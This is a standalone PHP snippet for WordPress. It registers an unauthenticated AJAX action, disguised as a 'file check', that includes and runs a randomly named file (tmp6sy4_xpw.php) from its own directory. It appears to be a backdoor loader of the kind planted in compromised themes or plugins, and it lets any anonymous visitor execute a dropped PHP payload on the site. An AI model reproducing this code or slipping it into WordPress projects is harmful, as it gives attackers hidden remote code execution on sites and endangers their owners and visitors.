if(!function_exists('file_check_tmp6sy4_xpw')){ add_action('wp_ajax_nopriv_file_check_tmp6sy4_xpw', 'file_check_tmp6sy4_xpw'); add_action('wp_ajax_file_check_tmp6sy4_xpw', 'file_check_tmp6sy4_xpw'); function file_check_tmp6sy4_xpw() { $file = __DIR__ . '/' . 'tmp6sy4_xpw.php'; if (file_exists($file)) { include $file; } die(); } }